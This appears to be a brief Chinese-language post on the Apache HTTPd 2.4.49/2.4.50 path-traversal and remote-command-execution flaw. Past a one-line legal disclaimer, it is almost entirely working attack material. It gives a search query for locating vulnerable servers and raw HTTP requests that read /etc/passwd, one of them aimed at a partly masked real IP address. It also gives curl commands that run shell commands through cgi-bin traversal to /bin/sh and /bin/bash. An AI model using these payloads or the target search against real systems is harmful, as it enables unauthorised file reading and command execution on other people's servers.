遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
寻找目标
header="Apache/2.4.49"
影响版本
Apache HTTPd 2.4.49/2.4.50版本
漏洞检测
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 208.110.xx.xx:443
apache.jpg
或者
curl --data "echo;id" 'http://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
11.jpg
漏洞利用
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1
Host: localhost:8080
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 52
Content-Type: application/x-www-form-urlencoded
Connection: close
echo -e "Host: 127.0.0.1\nUser-Agent: exp~~`id`~~\n"
curl --proxy http://127.0.0.1:8080 -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
curl --proxy http://127.0.0.1:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
网友评论